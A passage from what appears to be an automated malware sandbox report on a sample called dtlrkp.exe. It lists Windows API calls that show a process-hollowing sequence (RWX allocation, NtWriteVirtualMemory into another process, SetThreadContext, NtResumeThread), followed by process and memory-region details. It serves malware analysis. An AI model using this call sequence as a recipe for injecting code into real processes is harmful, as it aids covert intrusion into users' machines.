lpAddress=0x400000, dwSize=0xa2000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0142.465] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eacc | out: Wow64Process=0x19eacc*=1) returned 1 [0142.465] lstrlenW (lpString="dtlrkp.exe") returned 10 [0142.465] lstrlenW (lpString="ntdll.dll") returned 9 [0142.465] lstrlenW (lpString="ntdll.dll") returned 9 [0142.465] lstrlenW (lpString="ntdll.dll") returned 9 [0142.465] lstrlenW (lpString="ntdll.dll") returned 9 [0142.465] lstrlenW (lpString="tdll.dll") returned 8 [0142.465] lstrlenW (lpString="dll.dll") returned 7 [0142.465] lstrlenW (lpString="ll.dll") returned 6 [0142.466] lstrlenW (lpString="l.dll") returned 5 [0142.466] lstrlenW (lpString=".dll") returned 4 [0142.466] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0142.466] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0142.466] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2000000 [0142.466] ReadFile (in: hFile=0x1ec, lpBuffer=0x2000000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea9c, lpOverlapped=0x0 | out: lpBuffer=0x2000000*, lpNumberOfBytesRead=0x19ea9c*=0x1784a0, lpOverlapped=0x0) returned 1 [0142.519] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000 [0142.548] CloseHandle (hObject=0x1ec) returned 1 [0142.548] VirtualFree (lpAddress=0x2000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.608] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.627] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x400000, Buffer=0x4d0000*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x19eb00 | out: Buffer=0x4d0000*, NumberOfBytesWritten=0x19eb00*=0x400) returned 0x0 [0142.711] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eacc | out: Wow64Process=0x19eacc*=1) returned 1 [0142.712] lstrlenW (lpString="dtlrkp.exe") returned 10 [0142.712] lstrlenW (lpString="ntdll.dll") returned 9 [0142.712] lstrlenW (lpString="ntdll.dll") returned 9 [0142.712] lstrlenW (lpString="ntdll.dll") returned 9 [0142.712] lstrlenW (lpString="ntdll.dll") returned 9 [0142.712] lstrlenW (lpString="tdll.dll") returned 8 [0142.712] lstrlenW (lpString="dll.dll") returned 7 [0142.712] lstrlenW (lpString="ll.dll") returned 6 [0142.712] lstrlenW (lpString="l.dll") returned 5 [0142.712] lstrlenW (lpString=".dll") returned 4 [0142.712] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0142.712] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0142.712] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2000000 [0142.713] ReadFile (in: hFile=0x1ec, lpBuffer=0x2000000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea9c, lpOverlapped=0x0 | out: lpBuffer=0x2000000*, lpNumberOfBytesRead=0x19ea9c*=0x1784a0, lpOverlapped=0x0) returned 1 [0142.737] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000 [0142.774] CloseHandle (hObject=0x1ec) returned 1 [0142.774] VirtualFree (lpAddress=0x2000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.789] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.809] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x401000, Buffer=0x4d0400*, NumberOfBytesToWrite=0x13800, NumberOfBytesWritten=0x19eb00 | out: Buffer=0x4d0400*, NumberOfBytesWritten=0x19eb00*=0x13800) returned 0x0 [0142.914] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eacc | out: Wow64Process=0x19eacc*=1) returned 1 [0142.914] lstrlenW (lpString="dtlrkp.exe") returned 10 [0142.914] lstrlenW (lpString="ntdll.dll") returned 9 [0142.914] lstrlenW (lpString="ntdll.dll") returned 9 [0142.914] lstrlenW (lpString="ntdll.dll") returned 9 [0142.915] lstrlenW (lpString="ntdll.dll") returned 9 [0142.915] lstrlenW (lpString="tdll.dll") returned 8 [0142.915] lstrlenW (lpString="dll.dll") returned 7 [0142.915] lstrlenW (lpString="ll.dll") returned 6 [0142.915] lstrlenW (lpString="l.dll") returned 5 [0142.915] lstrlenW (lpString=".dll") returned 4 [0142.915] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0142.915] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0142.915] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2000000 [0142.916] ReadFile (in: hFile=0x1ec, lpBuffer=0x2000000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea9c, lpOverlapped=0x0 | out: lpBuffer=0x2000000*, lpNumberOfBytesRead=0x19ea9c*=0x1784a0, lpOverlapped=0x0) returned 1 [0142.947] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000 [0142.980] CloseHandle (hObject=0x1ec) returned 1 [0142.980] VirtualFree (lpAddress=0x2000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.034] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.057] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x415000, Buffer=0x4e3c00*, NumberOfBytesToWrite=0x4200, NumberOfBytesWritten=0x19eb00 | out: Buffer=0x4e3c00*, NumberOfBytesWritten=0x19eb00*=0x4200) returned 0x0 [0143.098] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eacc | out: Wow64Process=0x19eacc*=1) returned 1 [0143.098] lstrlenW (lpString="dtlrkp.exe") returned 10 [0143.098] lstrlenW (lpString="ntdll.dll") returned 9 [0143.098] lstrlenW (lpString="ntdll.dll") returned 9 [0143.098] lstrlenW (lpString="ntdll.dll") returned 9 [0143.099] lstrlenW (lpString="ntdll.dll") returned 9 [0143.099] lstrlenW (lpString="tdll.dll") returned 8 [0143.099] lstrlenW (lpString="dll.dll") returned 7 [0143.099] lstrlenW (lpString="ll.dll") returned 6 [0143.099] lstrlenW (lpString="l.dll") returned 5 [0143.099] lstrlenW (lpString=".dll") returned 4 [0143.099] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0143.099] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0143.099] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2000000 [0143.099] ReadFile (in: hFile=0x1ec, lpBuffer=0x2000000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea9c, lpOverlapped=0x0 | out: lpBuffer=0x2000000*, lpNumberOfBytesRead=0x19ea9c*=0x1784a0, lpOverlapped=0x0) returned 1 [0143.121] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000 [0143.166] CloseHandle (hObject=0x1ec) returned 1 [0143.166] VirtualFree (lpAddress=0x2000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.184] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.224] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x41a000, Buffer=0x4e7e00*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x19eb00 | out: Buffer=0x4e7e00*, NumberOfBytesWritten=0x19eb00*=0x200) returned 0x0 [0143.237] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eacc | out: Wow64Process=0x19eacc*=1) returned 1 [0143.237] lstrlenW (lpString="dtlrkp.exe") returned 10 [0143.238] lstrlenW (lpString="ntdll.dll") returned 9 [0143.238] lstrlenW (lpString="ntdll.dll") returned 9 [0143.238] lstrlenW (lpString="ntdll.dll") returned 9 [0143.238] lstrlenW (lpString="ntdll.dll") returned 9 [0143.238] lstrlenW (lpString="tdll.dll") returned 8 [0143.238] lstrlenW (lpString="dll.dll") returned 7 [0143.238] lstrlenW (lpString="ll.dll") returned 6 [0143.238] lstrlenW (lpString="l.dll") returned 5 [0143.238] lstrlenW (lpString=".dll") returned 4 [0143.238] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0143.238] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0143.238] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2000000 [0143.238] ReadFile (in: hFile=0x1ec, lpBuffer=0x2000000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea9c, lpOverlapped=0x0 | out: lpBuffer=0x2000000*, lpNumberOfBytesRead=0x19ea9c*=0x1784a0, lpOverlapped=0x0) returned 1 [0143.266] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000 [0143.295] CloseHandle (hObject=0x1ec) returned 1 [0143.295] VirtualFree (lpAddress=0x2000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.332] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.395] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x4a0000, Buffer=0x4e8000*, NumberOfBytesToWrite=0x2000, NumberOfBytesWritten=0x19eb00 | out: Buffer=0x4e8000*, NumberOfBytesWritten=0x19eb00*=0x2000) returned 0x0 [0143.442] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eacc | out: Wow64Process=0x19eacc*=1) returned 1 [0143.442] lstrlenW (lpString="dtlrkp.exe") returned 10 [0143.442] lstrlenW (lpString="ntdll.dll") returned 9 [0143.442] lstrlenW (lpString="ntdll.dll") returned 9 [0143.442] lstrlenW (lpString="ntdll.dll") returned 9 [0143.442] lstrlenW (lpString="ntdll.dll") returned 9 [0143.442] lstrlenW (lpString="tdll.dll") returned 8 [0143.442] lstrlenW (lpString="dll.dll") returned 7 [0143.442] lstrlenW (lpString="ll.dll") returned 6 [0143.442] lstrlenW (lpString="l.dll") returned 5 [0143.442] lstrlenW (lpString=".dll") returned 4 [0143.442] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0143.443] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0143.443] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2000000 [0143.443] ReadFile (in: hFile=0x1ec, lpBuffer=0x2000000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19ea9c, lpOverlapped=0x0 | out: lpBuffer=0x2000000*, lpNumberOfBytesRead=0x19ea9c*=0x1784a0, lpOverlapped=0x0) returned 1 [0143.465] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000 [0143.491] CloseHandle (hObject=0x1ec) returned 1 [0143.491] VirtualFree (lpAddress=0x2000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.508] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.529] NtWriteVirtualMemory (in: ProcessHandle=0x1e4, BaseAddress=0x312008, Buffer=0x19f29c*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x19eb00 | out: Buffer=0x19f29c*, NumberOfBytesWritten=0x19eb00*=0x4) returned 0x0 [0143.532] SetThreadContext (hThread=0x1e0, lpContext=0x19ef44*(ContextFlags=0x10007, Dr0=0x19f038, Dr1=0x7a0, Dr2=0x1a1e64, Dr3=0x536cd652, Dr6=0x10, Dr7=0x774ba260, FloatSave.ControlWord=0x19f001, FloatSave.StatusWord=0x19f080, FloatSave.TagWord=0x1a1714, FloatSave.ErrorOffset=0xa, FloatSave.ErrorSelector=0x101efd4, FloatSave.DataOffset=0x536cd652, FloatSave.DataSelector=0x17c, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xec, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x2, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x45, [17]=0x6e, [18]=0x3c, [19]=0xf, [20]=0xc, [21]=0xf0, [22]=0x19, [23]=0x0, [24]=0x1a, [25]=0x9c, [26]=0x49, [27]=0x77, [28]=0x80, [29]=0xf0, [30]=0x19, [31]=0x0, [32]=0x38, [33]=0xf0, [34]=0x19, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x25, [41]=0x2, [42]=0x0, [43]=0xc0, [44]=0x9a, [45]=0x9d, [46]=0x49, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0xf4, [57]=0xf0, [58]=0x19, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x15, [65]=0x6e, [66]=0x3c, [67]=0xf, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x50, [73]=0x21, [74]=0x54, [75]=0x0, [76]=0xec, [77]=0xef, [78]=0x19, [79]=0x0), FloatSave.Cr0NpxState=0x54218c, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x312000, Edx=0x0, Ecx=0x0, Eax=0x4139de, Ebp=0x0, Eip=0x774d8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0xf8, [1]=0xf1, [2]=0x19, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x25, [9]=0x2, [10]=0x0, [11]=0xc0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x38, [17]=0xf0, [18]=0x19, [19]=0x0, [20]=0x2b, [21]=0xba, [22]=0x49, [23]=0x77, [24]=0xc0, [25]=0xf0, [26]=0x19, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x9, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x88, [41]=0xf0, [42]=0x19, [43]=0x0, [44]=0x33, [45]=0xb8, [46]=0x49, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x59, [53]=0xb8, [54]=0x49, [55]=0x77, [56]=0x5d, [57]=0x71, [58]=0x3c, [59]=0xf, [60]=0x0, [61]=0xf2, [62]=0x19, [63]=0x0, [64]=0x90, [65]=0xf2, [66]=0x19, [67]=0x0, [68]=0xf8, [69]=0xf1, [70]=0x19, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x9c, [77]=0xf1, [78]=0x19, [79]=0x0, [80]=0xc0, [81]=0xf0, [82]=0x19, [83]=0x0, [84]=0x0, [85]=0xf2, [86]=0x19, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x48, [97]=0xf0, [98]=0x19, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x70, [105]=0xff, [106]=0x19, [107]=0x0, [108]=0x30, [109]=0xee, [110]=0x4d, [111]=0x77, [112]=0xfd, [113]=0xa0, [114]=0x70, [115]=0x78, [116]=0xfe, [117]=0xff, [118]=0xff, [119]=0xff, [120]=0x59, [121]=0xb8, [122]=0x49, [123]=0x77, [124]=0x9e, [125]=0x1, [126]=0x4a, [127]=0x77, [128]=0x20, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x4, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0xf8, [145]=0xf1, [146]=0x19, [147]=0x0, [148]=0xbc, [149]=0xf0, [150]=0x19, [151]=0x0, [152]=0x1, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x90, [157]=0xf2, [158]=0x19, [159]=0x0, [160]=0xc0, [161]=0x1, [162]=0x4a, [163]=0x77, [164]=0x74, [165]=0xf1, [166]=0x19, [167]=0x0, [168]=0x20, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x12, [177]=0x0, [178]=0x0, [179]=0x1, [180]=0xc8, [181]=0xf0, [182]=0x19, [183]=0x0, [184]=0x6e, [185]=0x0, [186]=0x74, [187]=0x0, [188]=0x64, [189]=0x0, [190]=0x6c, [191]=0x0, [192]=0x6c, [193]=0x0, [194]=0x2e, [195]=0x0, [196]=0x64, [197]=0x0, [198]=0x6c, [199]=0x0, [200]=0x6c, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x2c, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x40, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0xcc, [273]=0xf1, [274]=0x19, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x16, [281]=0x0, [282]=0x18, [283]=0x0, [284]=0xc, [285]=0xfc, [286]=0x19, [287]=0x0, [288]=0x2, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0xc8, [293]=0xf1, [294]=0x19, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x80, [302]=0x3e, [303]=0x0, [304]=0xd4, [305]=0x57, [306]=0x68, [307]=0xf4, [308]=0x29, [309]=0x71, [310]=0x3c, [311]=0xf, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0xc, [317]=0xf2, [318]=0x19, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x2, [323]=0x0, [324]=0x68, [325]=0xf1, [326]=0x19, [327]=0x0, [328]=0x68, [329]=0xf1, [330]=0x19, [331]=0x0, [332]=0x68, [333]=0xf1, [334]=0x19, [335]=0x0, [336]=0x2, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0xa1, [349]=0x70, [350]=0x3c, [351]=0xf, [352]=0xec, [353]=0xf2, [354]=0x19, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0xb5, [361]=0x93, [362]=0x49, [363]=0x77, [364]=0x14, [365]=0xf2, [366]=0x19, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x2c, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x88, [377]=0xf7, [378]=0x19, [379]=0x0, [380]=0xc, [381]=0xfc, [382]=0x19, [383]=0x0, [384]=0x30, [385]=0x94, [386]=0x49, [387]=0x77, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x1, [396]=0x16, [397]=0x0, [398]=0x18, [399]=0x0, [400]=0xc, [401]=0xfc, [402]=0x19, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x64, [425]=0xf2, [426]=0x19, [427]=0x0, [428]=0x50, [429]=0xf7, [430]=0x19, [431]=0x0, [432]=0x9c, [433]=0xb7, [434]=0x49, [435]=0x77, [436]=0x0, [437]=0xf2, [438]=0x19, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x61, [445]=0x71, [446]=0x3c, [447]=0xf, [448]=0x1, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x58, [453]=0xf2, [454]=0x19, [455]=0x0, [456]=0x1, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0xcd, [469]=0x35, [470]=0x4a, [471]=0x77, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x9, [481]=0x36, [482]=0x4a, [483]=0x77, [484]=0x0, [485]=0xf2, [486]=0x19, [487]=0x0, [488]=0x50, [489]=0x21, [490]=0x54, [491]=0x0, [492]=0x84, [493]=0xf2, [494]=0x19, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x50, [509]=0xf7, [510]=0x19, [511]=0x0))) returned 1 [0143.575] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19eaf4 | out: Wow64Process=0x19eaf4*=1) returned 1 [0143.575] lstrlenW (lpString="dtlrkp.exe") returned 10 [0143.575] lstrlenW (lpString="ntdll.dll") returned 9 [0143.575] lstrlenW (lpString="ntdll.dll") returned 9 [0143.575] lstrlenW (lpString="ntdll.dll") returned 9 [0143.575] lstrlenW (lpString="ntdll.dll") returned 9 [0143.575] lstrlenW (lpString="tdll.dll") returned 8 [0143.575] lstrlenW (lpString="dll.dll") returned 7 [0143.575] lstrlenW (lpString="ll.dll") returned 6 [0143.575] lstrlenW (lpString="l.dll") returned 5 [0143.575] lstrlenW (lpString=".dll") returned 4 [0143.575] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0143.576] GetFileSize (in: hFile=0x1ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0143.576] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0x2000000 [0143.576] ReadFile (in: hFile=0x1ec, lpBuffer=0x2000000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19eac4, lpOverlapped=0x0 | out: lpBuffer=0x2000000*, lpNumberOfBytesRead=0x19eac4*=0x1784a0, lpOverlapped=0x0) returned 1 [0143.594] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000 [0143.626] CloseHandle (hObject=0x1ec) returned 1 [0143.626] VirtualFree (lpAddress=0x2000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.644] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.661] NtResumeThread (in: ThreadHandle=0x1e0, SuspendCount=0x19eb10 | out: SuspendCount=0x19eb10*=0x1) returned 0x0 [0143.734] ExitProcess (uExitCode=0x0) Thread: id = 6 os_tid = 0x860 Thread: id = 7 os_tid = 0xfd0 Process: id = "3" image_name = "dtlrkp.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dtlrkp.exe" page_root = "0x71d7e000" os_pid = "0xcc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x870" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hzuplybmb" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 447 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 448 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 449 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 450 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 451 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 452 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 453 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 454 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 455 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 456 start_va = 0x400000 end_va = 0x404fff monitored = 1 entry_point = 0x401000 region_type = mapped_file name = "dtlrkp.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dtlrkp.exe") Region: id = 457 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 458 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 